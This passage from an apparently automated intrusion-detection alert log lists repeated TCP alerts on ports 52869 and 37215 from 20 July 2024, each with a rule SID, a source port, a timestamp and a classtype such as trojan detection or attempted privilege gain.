                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.076249
                      SID:2027339
                      Source Port:53822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.043746
                      SID:2835222
                      Source Port:44424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.584748
                      SID:2831300
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:19.727778
                      SID:2027339
                      Source Port:49146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.560327
                      SID:2831300
                      Source Port:49242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.468948
                      SID:2027339
                      Source Port:48002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.202460
                      SID:2027339
                      Source Port:34558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.576731
                      SID:2025132
                      Source Port:38140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.039721
                      SID:2835222
                      Source Port:43334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.383065
                      SID:2027339
                      Source Port:43736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.042861
                      SID:2027339
                      Source Port:37684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.010711
                      SID:2831300
                      Source Port:48188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.543463
                      SID:2025132
                      Source Port:50722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2835222
                      Source Port:50422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2829579
                      Source Port:39250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.255022
                      SID:2027339
                      Source Port:55718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.644546
                      SID:2027339
                      Source Port:57396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468656
                      SID:2831300
                      Source Port:47314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.588800
                      SID:2027339
                      Source Port:47172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323611
                      SID:2829579
                      Source Port:42424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2835222
                      Source Port:44906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.040673
                      SID:2831300
                      Source Port:42252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.477993
                      SID:2831300
                      Source Port:36854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2829579
                      Source Port:59174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.685807
                      SID:2835222
                      Source Port:33524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.518689
                      SID:2025132
                      Source Port:41002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.533428
                      SID:2027339
                      Source Port:50242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2829579
                      Source Port:34208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323603
                      SID:2829579
                      Source Port:54890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.590968
                      SID:2027339
                      Source Port:35702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.249595
                      SID:2835222
                      Source Port:41342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.255189
                      SID:2831300
                      Source Port:47746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.058741
                      SID:2831300
                      Source Port:60494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.355569
                      SID:2831300
                      Source Port:49756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.807124
                      SID:2835222
                      Source Port:43310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.148043
                      SID:2025132
                      Source Port:33024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.291387
                      SID:2027339
                      Source Port:51238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.648413
                      SID:2027339
                      Source Port:33050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2829579
                      Source Port:53020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.034294
                      SID:2831300
                      Source Port:60636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.592127
                      SID:2025132
                      Source Port:35770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2829579
                      Source Port:57522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.107735
                      SID:2835222
                      Source Port:48558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.471230
                      SID:2831300
                      Source Port:51260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.482880
                      SID:2027339
                      Source Port:42508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.412131
                      SID:2027339
                      Source Port:35768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.712041
                      SID:2027339
                      Source Port:36236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.386265
                      SID:2027339
                      Source Port:44828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.872548
                      SID:2831300
                      Source Port:39570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.383428
                      SID:2027339
                      Source Port:36058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2835222
                      Source Port:55596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.587077
                      SID:2831300
                      Source Port:51958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.130228
                      SID:2025132
                      Source Port:33030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.220683
                      SID:2835222
                      Source Port:55796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.234287
                      SID:2831300
                      Source Port:50592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.333807
                      SID:2027339
                      Source Port:38768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330643
                      SID:2831300
                      Source Port:43558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.369729
                      SID:2831300
                      Source Port:34040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.310476
                      SID:2835222
                      Source Port:51076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.011285
                      SID:2025132
                      Source Port:40684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.329971
                      SID:2027339
                      Source Port:45446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.122985
                      SID:2027339
                      Source Port:41456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.685490
                      SID:2027339
                      Source Port:47502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.082891
                      SID:2025132
                      Source Port:34116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2829579
                      Source Port:48124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.239251
                      SID:2025132
                      Source Port:36830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.447452
                      SID:2027339
                      Source Port:53768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.513568
                      SID:2829579
                      Source Port:38652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.165543
                      SID:2027339
                      Source Port:48192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.727506
                      SID:2025132
                      Source Port:50074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.391843
                      SID:2027339
                      Source Port:50872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.201174
                      SID:2027339
                      Source Port:37750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.468494
                      SID:2831300
                      Source Port:58312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.889934
                      SID:2831300
                      Source Port:34334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.179082
                      SID:2025132
                      Source Port:49096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.107636
                      SID:2025132
                      Source Port:37448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:50.384864
                      SID:2025132
                      Source Port:53240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.490071
                      SID:2831300
                      Source Port:57868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.830942
                      SID:2025132
                      Source Port:44430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.438205
                      SID:2025132
                      Source Port:47286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.557200
                      SID:2835222
                      Source Port:37178
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.161094
                      SID:2831300
                      Source Port:60344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.216480
                      SID:2027339
                      Source Port:39806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.058977
                      SID:2027339
                      Source Port:42486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.339812
                      SID:2831300
                      Source Port:47364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.958789
                      SID:2027339
                      Source Port:34538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.302136
                      SID:2025132
                      Source Port:53642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.161261
                      SID:2027339
                      Source Port:47420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2829579
                      Source Port:44772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.916755
                      SID:2025132
                      Source Port:40394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.457080
                      SID:2025132
                      Source Port:37510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2835222
                      Source Port:35384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2835222
                      Source Port:44376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.424851
                      SID:2829579
                      Source Port:54286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2829579
                      Source Port:51434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2829579
                      Source Port:39756
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.057117
                      SID:2025132
                      Source Port:38476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.946132
                      SID:2025132
                      Source Port:49414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.113186
                      SID:2027339
                      Source Port:36162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.827209
                      SID:2829579
                      Source Port:55366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.556240
                      SID:2025132
                      Source Port:43810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.804757
                      SID:2025132
                      Source Port:43584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.797449
                      SID:2027339
                      Source Port:37440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.575211
                      SID:2027339
                      Source Port:54852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.280581
                      SID:2025132
                      Source Port:47142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.454427
                      SID:2027339
                      Source Port:39910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.997704
                      SID:2027339
                      Source Port:33390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.189668
                      SID:2027339
                      Source Port:54518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2835222
                      Source Port:51156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.732595
                      SID:2831300
                      Source Port:44042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.497829
                      SID:2027339
                      Source Port:52460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.880694
                      SID:2025132
                      Source Port:60172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2835222
                      Source Port:49652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.648653
                      SID:2025132
                      Source Port:57128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.918922
                      SID:2831300
                      Source Port:43476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2829579
                      Source Port:59252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.127325
                      SID:2835222
                      Source Port:48800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.210836
                      SID:2025132
                      Source Port:44162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.584797
                      SID:2025132
                      Source Port:49048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2835222
                      Source Port:41472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.479533
                      SID:2025132
                      Source Port:49252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.599613
                      SID:2027339
                      Source Port:59344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.616747
                      SID:2025132
                      Source Port:59268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.626162
                      SID:2027339
                      Source Port:41304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.694959
                      SID:2831300
                      Source Port:46330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2829579
                      Source Port:52286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502843
                      SID:2831300
                      Source Port:56726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.446932
                      SID:2027339
                      Source Port:46926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.057445
                      SID:2025132
                      Source Port:55914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.345531
                      SID:2027339
                      Source Port:38510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.939891
                      SID:2835222
                      Source Port:60416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.958012
                      SID:2027339
                      Source Port:54022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.821284
                      SID:2831300
                      Source Port:36640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.828517
                      SID:2025132
                      Source Port:50482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.499861
                      SID:2027339
                      Source Port:57474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2829579
                      Source Port:52152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.221858
                      SID:2025132
                      Source Port:38976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2835222
                      Source Port:35550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.981798
                      SID:2025132
                      Source Port:54340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.298825
                      SID:2027339
                      Source Port:48366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.641730
                      SID:2831300
                      Source Port:54424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.262795
                      SID:2025132
                      Source Port:44066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.351081
                      SID:2025132
                      Source Port:40112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.733520
                      SID:2025132
                      Source Port:47944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.037863
                      SID:2831300
                      Source Port:41838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.517370
                      SID:2025132
                      Source Port:33262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:55.694402
                      SID:2027339
                      Source Port:53588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2829579
                      Source Port:44670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.477468
                      SID:2027339
                      Source Port:38822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.351053
                      SID:2027339
                      Source Port:41584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.683294
                      SID:2027339
                      Source Port:56680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.252147
                      SID:2025132
                      Source Port:58196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.444430
                      SID:2027339
                      Source Port:60994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857158
                      SID:2829579
                      Source Port:58160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.644841
                      SID:2829579
                      Source Port:57442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.775023
                      SID:2835222
                      Source Port:56916
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.748136
                      SID:2027339
                      Source Port:42692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.804681
                      SID:2027339
                      Source Port:57068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2835222
                      Source Port:45748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2829579
                      Source Port:38392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.446803
                      SID:2027339
                      Source Port:58436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.150031
                      SID:2025132
                      Source Port:37840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.781031
                      SID:2831300
                      Source Port:53874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.454427
                      SID:2027339
                      Source Port:55466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.602976
                      SID:2027339
                      Source Port:35892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.192069
                      SID:2835222
                      Source Port:37122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.347950
                      SID:2027339
                      Source Port:57498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.954404
                      SID:2027339
                      Source Port:33816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.501694
                      SID:2027339
                      Source Port:54204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2829579
                      Source Port:57752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.227686
                      SID:2027339
                      Source Port:42324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.198584
                      SID:2831300
                      Source Port:35552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.369794
                      SID:2027339
                      Source Port:49356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.967255
                      SID:2025132
                      Source Port:49834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2829579
                      Source Port:53450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.984925
                      SID:2025132
                      Source Port:38206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.443193
                      SID:2831300
                      Source Port:54752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.922584
                      SID:2831300
                      Source Port:48886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.557201
                      SID:2829579
                      Source Port:59788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.233806
                      SID:2829579
